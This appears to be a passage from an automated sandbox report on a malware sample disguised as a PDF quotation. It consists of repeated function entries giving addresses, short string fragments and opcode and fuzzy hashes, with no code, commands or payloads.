                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q
                                                                            • API String ID: 0-1760409148
                                                                            • Opcode ID: 34da4fafa952cd57d8f1a257dede727138b8a9a40fec1ec5be4426d5a67db8cc
                                                                            • Instruction ID: e10963c4b920a390ef74b9b55a28a42fe812d3aafb1208a6ff2938e1c652852a
                                                                            • Opcode Fuzzy Hash: 34da4fafa952cd57d8f1a257dede727138b8a9a40fec1ec5be4426d5a67db8cc
                                                                            • Instruction Fuzzy Hash: 2E51F4307042059FCB149B398990B6A77B6BB85710F2549AAE807DB3D9DF31DD06CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD6770 Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 64c574962b600039b62ca53960883f62663dd34e9fd6b4d369ce585df8b1c7b9
                                                                            • Instruction ID: 66768dadc77070a1dc49265cc3ccc340acaede9ce6defe5228003c4a04f1afee
                                                                            • Opcode Fuzzy Hash: 64c574962b600039b62ca53960883f62663dd34e9fd6b4d369ce585df8b1c7b9
                                                                            • Instruction Fuzzy Hash: FB127C74E11219CFDB24CF79D984AAEB7F2BF88305F15C929D406AB244DB34A942CF80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD79F0 Relevance: 1.5, Strings: 1, Instructions: 294COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID: 0-3916222277
                                                                            • Opcode ID: f8fcc7f0fe830a4fec3eb0708c436a73e38b7b7c798d76ab048af502d12f7b0f
                                                                            • Instruction ID: 7f7fb1fd40607761e64a2af60f4389169ba8ee95ffafc1a3bc1d32a0f695205d
                                                                            • Opcode Fuzzy Hash: f8fcc7f0fe830a4fec3eb0708c436a73e38b7b7c798d76ab048af502d12f7b0f
                                                                            • Instruction Fuzzy Hash: CAA19E71F001158FCB04DFA9CD80AAEFBB2FBC8221B14852AD61AD7745DB34ED518B91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD6763 Relevance: 1.5, Strings: 1, Instructions: 254COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 292c47df17c3e40f960f4d8a22e08966b8cc6edf51f5012b1bec4057021568e6
                                                                            • Instruction ID: ab20c7a87a328d6872de1192e7e429f19a9092ca102dc58a8c24c4dcdede498d
                                                                            • Opcode Fuzzy Hash: 292c47df17c3e40f960f4d8a22e08966b8cc6edf51f5012b1bec4057021568e6
                                                                            • Instruction Fuzzy Hash: 8EA19C34E111299BDB14DF79D8846EEB7B3BFC8305F15CA29E406A7358DB34A902CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD67AA Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: LR`q
                                                                            • API String ID: 0-3712084042
                                                                            • Opcode ID: 746df6666d5664f0fa2c0091558f588f33a440a9a4ec689a6aeb0bb7abb221e1
                                                                            • Instruction ID: 0903c402bba5204deab30075e2ad52184ec476495bffa9ee39d917f327844347
                                                                            • Opcode Fuzzy Hash: 746df6666d5664f0fa2c0091558f588f33a440a9a4ec689a6aeb0bb7abb221e1
                                                                            • Instruction Fuzzy Hash: 3791BF35E011199FDB14DF79E8846AEB7B3BFC8305F15CA29E406A7258DB34A902CB81
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADAB99 Relevance: .3, Instructions: 314COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 76176fc6a9f1ae164dc407c22e83fb4045b917be1dcc11b52005ee820ee9efc9
                                                                            • Instruction ID: 539a91db3909e0591a7d50730adcfaec45f3a55fd9eedacef917875b037477f2
                                                                            • Opcode Fuzzy Hash: 76176fc6a9f1ae164dc407c22e83fb4045b917be1dcc11b52005ee820ee9efc9
                                                                            • Instruction Fuzzy Hash: CDC1AD7190460ACFDB11CFA8C5807BABBF1FB85311F14896AD8879B246DF34E946CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD2FF0 Relevance: .3, Instructions: 313COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 773e29e2c8d3e7c3e52baf43030b14cbf93ce22178c0d020c2ae35ff92355b25
                                                                            • Instruction ID: 27c6e9a4ee03cc42ddab02809c9f1282f4beabe271174ff0dd173376dfff0537
                                                                            • Opcode Fuzzy Hash: 773e29e2c8d3e7c3e52baf43030b14cbf93ce22178c0d020c2ae35ff92355b25
                                                                            • Instruction Fuzzy Hash: 06C1B331E0524A9FCF11DFA8C9906EEBBB2FF45300F5484AAE506AB251DB349946CF52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD754F Relevance: .2, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f64b8732d594de2414b1e4f106b212b275f478318bf376bdd5b0acb4893772d3
                                                                            • Instruction ID: 665e7abe761deb4a5eae49e2cc8231da3d23dc84f4e95df740894b8c93789f97
                                                                            • Opcode Fuzzy Hash: f64b8732d594de2414b1e4f106b212b275f478318bf376bdd5b0acb4893772d3
                                                                            • Instruction Fuzzy Hash: DC916E36B101159FC754DB69DD80BAEB7B3AFC8711F1A8464E40ADB369EE74AC01CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD7611 Relevance: .2, Instructions: 191COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6d137f020d04bd6558ea494df05e4d8b1237a0f67871c3c0ecf940fea9e80160
                                                                            • Instruction ID: d69e6529eeadd4f4c88e59a1f2eb7a35e3fc10208361b482245fc8e6909a651a
                                                                            • Opcode Fuzzy Hash: 6d137f020d04bd6558ea494df05e4d8b1237a0f67871c3c0ecf940fea9e80160
                                                                            • Instruction Fuzzy Hash: DF615036F101258FD754DB69DD80B6EB3A3AFC4711F1A8164E40A9B3A9DE74EC418B90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1210 Relevance: 5.4, Strings: 4, Instructions: 365COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: @$TJeq$TJeq$Te`q
                                                                            • API String ID: 0-1111236950
                                                                            • Opcode ID: ed8409d157cdcd003c8fd6ebce2742d36d21db3b8e9fdb146fee4d7293f4d1e9
                                                                            • Instruction ID: bd81d9f27ac4378fb8c9ee7428c8e8b4af04697fddb9e0d12729d52eaf9de3a8
                                                                            • Opcode Fuzzy Hash: ed8409d157cdcd003c8fd6ebce2742d36d21db3b8e9fdb146fee4d7293f4d1e9
                                                                            • Instruction Fuzzy Hash: FEE17B74B042448FDB44DBA8D594BADBBF2EF89310F1584A9E40BDB3A1DA35EC45CB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADB881 Relevance: 5.2, Strings: 4, Instructions: 217COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q$$`q
                                                                            • API String ID: 0-3426633177
                                                                            • Opcode ID: 9ad9619a0548dbdc62b26cf513c3e65f5d327ab2a750738487d21948f3c18666
                                                                            • Instruction ID: 839cdfdb084a8710476d27c2e740f01eea6e8f6ddfe4f4b8222c9e920c998f75
                                                                            • Opcode Fuzzy Hash: 9ad9619a0548dbdc62b26cf513c3e65f5d327ab2a750738487d21948f3c18666
                                                                            • Instruction Fuzzy Hash: AB612630B442164FC7189A798890B7E6AF7AB89724F56486AD407DB3D9DF30CC02C3A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD3960 Relevance: 5.2, Strings: 4, Instructions: 206COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: d%fq$d%fq$$`q$$`q
                                                                            • API String ID: 0-3426633177
                                                                            • Opcode ID: 4739464033835cedebd2e088c25456608101b6e2256cbd37a2c5990ee87dda6b
                                                                            • Instruction ID: b487f0d10e4bc49fa59aa564b0ec9eb87d55624c1b09da400e0f56a26239adef
                                                                            • Opcode Fuzzy Hash: 4739464033835cedebd2e088c25456608101b6e2256cbd37a2c5990ee87dda6b
                                                                            • Instruction Fuzzy Hash: 29813674A04208DFCF14DF69C584AAAB7F1EF88300F1089AAD94B9B261DB35E941CF52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD6007 Relevance: 3.8, Strings: 3, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: feq$ feq$4'`q
                                                                            • API String ID: 0-3260169214
                                                                            • Opcode ID: 38f11d3209fdd22b18edd60448452fa22ada566f07d67e9ab9ea5091d6da4039
                                                                            • Instruction ID: d87fd1279625363321ba3c6633a8dddcc560c0c0e716b9af58f5338f0215088d
                                                                            • Opcode Fuzzy Hash: 38f11d3209fdd22b18edd60448452fa22ada566f07d67e9ab9ea5091d6da4039
                                                                            • Instruction Fuzzy Hash: 50313C30E0024ADFCB55EFB4E5505EEBBB2FF94304F504568C11AA72A4DA356A06CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD6018 Relevance: 3.8, Strings: 3, Instructions: 68COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: feq$ feq$4'`q
                                                                            • API String ID: 0-3260169214
                                                                            • Opcode ID: b417d1995814164dbb74ab3cf50ea6ddf56cbb7173dab821efb672ec4351d424
                                                                            • Instruction ID: 7cc10c13223822e54df624d625506b6c3ef4a56c979b3f2e3158f6599ade08be
                                                                            • Opcode Fuzzy Hash: b417d1995814164dbb74ab3cf50ea6ddf56cbb7173dab821efb672ec4351d424
                                                                            • Instruction Fuzzy Hash: 5621FC30E0020EDBCB44EFA4E5505EEBBB6FF94304F604968D11AA72A4DB766A05CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADF598 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq$Hdq
                                                                            • API String ID: 0-3598684399
                                                                            • Opcode ID: 660e8450b85eeaccb1c46f5f5e472e88648eba867566595ac945ba433a97a4eb
                                                                            • Instruction ID: b6839f96543217ac739829b0d8f9bb86007e08cdab9c56ce5682b62512688bc1
                                                                            • Opcode Fuzzy Hash: 660e8450b85eeaccb1c46f5f5e472e88648eba867566595ac945ba433a97a4eb
                                                                            • Instruction Fuzzy Hash: 9341E0352147858FD324DF3AD59035BBBE2AF80314F108A2AD457CBAA5EF74E845CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD0A50 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: 615796bafe22f0459c6c31ce3ab843e9684f041a1cb80c4204eb4a338ca59f40
                                                                            • Instruction ID: 4f08bc0e59ffe6e32d588f4af6f53f4b3232bb4527f3745a200e8af83b584bb9
                                                                            • Opcode Fuzzy Hash: 615796bafe22f0459c6c31ce3ab843e9684f041a1cb80c4204eb4a338ca59f40
                                                                            • Instruction Fuzzy Hash: 82218E70B502089FCB48AFB9D5A86AEBAF7ABC8700F50442DE107E7394DE758C058B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD0A60 Relevance: 2.6, Strings: 2, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q$Te`q
                                                                            • API String ID: 0-1723402877
                                                                            • Opcode ID: 31eccc682fe041d486d910fe4cce781cc9b77a2f2785c069facdf59fbbe83877
                                                                            • Instruction ID: c43cb3cc7085d0e2de64098719795189c9ea41fa2b2865cd26c5aaab6fd8fe8e
                                                                            • Opcode Fuzzy Hash: 31eccc682fe041d486d910fe4cce781cc9b77a2f2785c069facdf59fbbe83877
                                                                            • Instruction Fuzzy Hash: C2216A70B502099FCB48ABB9D5A86AEBAF7AFC8700F50442DE107E7394DE758C058B95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADEB80 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: pdq
                                                                            • API String ID: 0-3193970922
                                                                            • Opcode ID: 08c3e67da9aac37925f51eaabc8fb8a1a6f487935f37aa55af4ca7c13164ed13
                                                                            • Instruction ID: 1a460ad0f62cd84d1c3702b219af4c706c83e77c3344d35f23a98a8a90b6ec50
                                                                            • Opcode Fuzzy Hash: 08c3e67da9aac37925f51eaabc8fb8a1a6f487935f37aa55af4ca7c13164ed13
                                                                            • Instruction Fuzzy Hash: 04514E76600104AFCB459FA8C944D697FB3FF9C3147198198E60A9B376DA32DC21DB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADFBA8 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: 59635e3f1a58fce9cd810f3a42d63c673f474d5a79d77e434ad75a416998f10a
                                                                            • Instruction ID: d903efe2dae3862a1e3102675909772d20640cbf9d3ba8542523185ffeffeded
                                                                            • Opcode Fuzzy Hash: 59635e3f1a58fce9cd810f3a42d63c673f474d5a79d77e434ad75a416998f10a
                                                                            • Instruction Fuzzy Hash: 2F41DD35A006068FCB00DF68C484A6AFBB1FF49320F158A96C916EB791DB30F852CBD0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADF410 Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (dq
                                                                            • API String ID: 0-1589488240
                                                                            • Opcode ID: fd6be161162500392c4a5abf22228bb16f9480ba0841fdda2f6d5c030e57b047
                                                                            • Instruction ID: f80e2e11c6b74d9b7557a509e9d93778addb471cbe14be089bf2dbc83dede6e9
                                                                            • Opcode Fuzzy Hash: fd6be161162500392c4a5abf22228bb16f9480ba0841fdda2f6d5c030e57b047
                                                                            • Instruction Fuzzy Hash: 0F2134313052815BD718AB6DE8807AB7BA6EFC9320F14403AE90ACB251DF75AC06C7D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADDF10 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 6a09bdd26eca07cb97b8bdbc8c6ae22d10b872f7885bbd846e81d0a59ecca12f
                                                                            • Instruction ID: 9fbe01f845662f4965cc1a8b700412dc4bb5e01fed64e20fd824eaf548e7862b
                                                                            • Opcode Fuzzy Hash: 6a09bdd26eca07cb97b8bdbc8c6ae22d10b872f7885bbd846e81d0a59ecca12f
                                                                            • Instruction Fuzzy Hash: 142102317442449FCB109B79D958B6A7FB6BF89720F2044AAE502CB3A1CF74DC05C7A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD9008 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 0e26172166022ee0c8ca759f6e697602e37babc30f84a0985c78f0a2837e7eab
                                                                            • Instruction ID: 030b0f19675d9ba17bb64a713907eb5813d65e5414a16a0ec6a668e77643a113
                                                                            • Opcode Fuzzy Hash: 0e26172166022ee0c8ca759f6e697602e37babc30f84a0985c78f0a2837e7eab
                                                                            • Instruction Fuzzy Hash: 8531F234B40115CFDB44DBA8D998BAEB7B2BB88705F500468E506DB3A4CB71DD02CB40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD1548 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 505c8c13787eb28b6604e1ebc89ec7940fb1fdbfe872c2250b003fa62224b0c3
                                                                            • Instruction ID: f5e0f3f70243aebe7205efa4ee6261bf3cb46e46319a233bc1f2cf4fbb5a465a
                                                                            • Opcode Fuzzy Hash: 505c8c13787eb28b6604e1ebc89ec7940fb1fdbfe872c2250b003fa62224b0c3
                                                                            • Instruction Fuzzy Hash: 21311274B401148FDB189BA8D598BADB7B2BF88B05F104469E90BDB3A4CF74DC02CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD78C0 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: \s`q
                                                                            • API String ID: 0-3034026754
                                                                            • Opcode ID: b0b9495bd1e385135cc34bf786ed5980487bd159231d51df455d2166dc729fdb
                                                                            • Instruction ID: 66b4706caabb82a2878fbfcff9852ccb115cef0176916264153e1a7b3dd70074
                                                                            • Opcode Fuzzy Hash: b0b9495bd1e385135cc34bf786ed5980487bd159231d51df455d2166dc729fdb
                                                                            • Instruction Fuzzy Hash: 0721AC323404208FCBA8DB79D894D6AB7F5EF8876431584AAF80ECB771DE21DC018B80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADD9A0 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 5bc4f64f7f265a9f789d2e2bb5644818f74f4deeaec573c0369f06dbbb3a15f3
                                                                            • Instruction ID: 21a27746f07a1175b36f2e961021bb10102d988320a28165345f38a2e456f9ca
                                                                            • Opcode Fuzzy Hash: 5bc4f64f7f265a9f789d2e2bb5644818f74f4deeaec573c0369f06dbbb3a15f3
                                                                            • Instruction Fuzzy Hash: 9B219031B501149FDB049B68D518BAEBBF6AFC8B14F20005AE106EB3A4CEB5DD018BD5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02ADD990 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: Te`q
                                                                            • API String ID: 0-1774740527
                                                                            • Opcode ID: 3471477188f14e4f56c7f0eec043555aeb40c64fd4011a169386982ad620169f
                                                                            • Instruction ID: 020711d968116f5de996052b509abd231a7e85a20e3b59a98ecd29c34a4d60c4
                                                                            • Opcode Fuzzy Hash: 3471477188f14e4f56c7f0eec043555aeb40c64fd4011a169386982ad620169f
                                                                            • Instruction Fuzzy Hash: EA11D372B401149FDB049B68D519BAEBBF6AF88B00F240059E107EB3A5CFB5DD058BD9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 02AD5E19 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.310698927.0000000002AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02AD0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2ad0000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 8dq
                                                                            • API String ID: 0-1567336683
                                                                            • Opcode ID: 547299ffe7abfe36020885e7ff760f41cb7056dfec7f7d10950448a698152781
                                                                            • Instruction ID: 1d543f79c888523842a4e395deb009715c07f1ae9838940c4b0138e55a72c1fb
                                                                            • Opcode Fuzzy Hash: 547299ffe7abfe36020885e7ff760f41cb7056dfec7f7d10950448a698152781
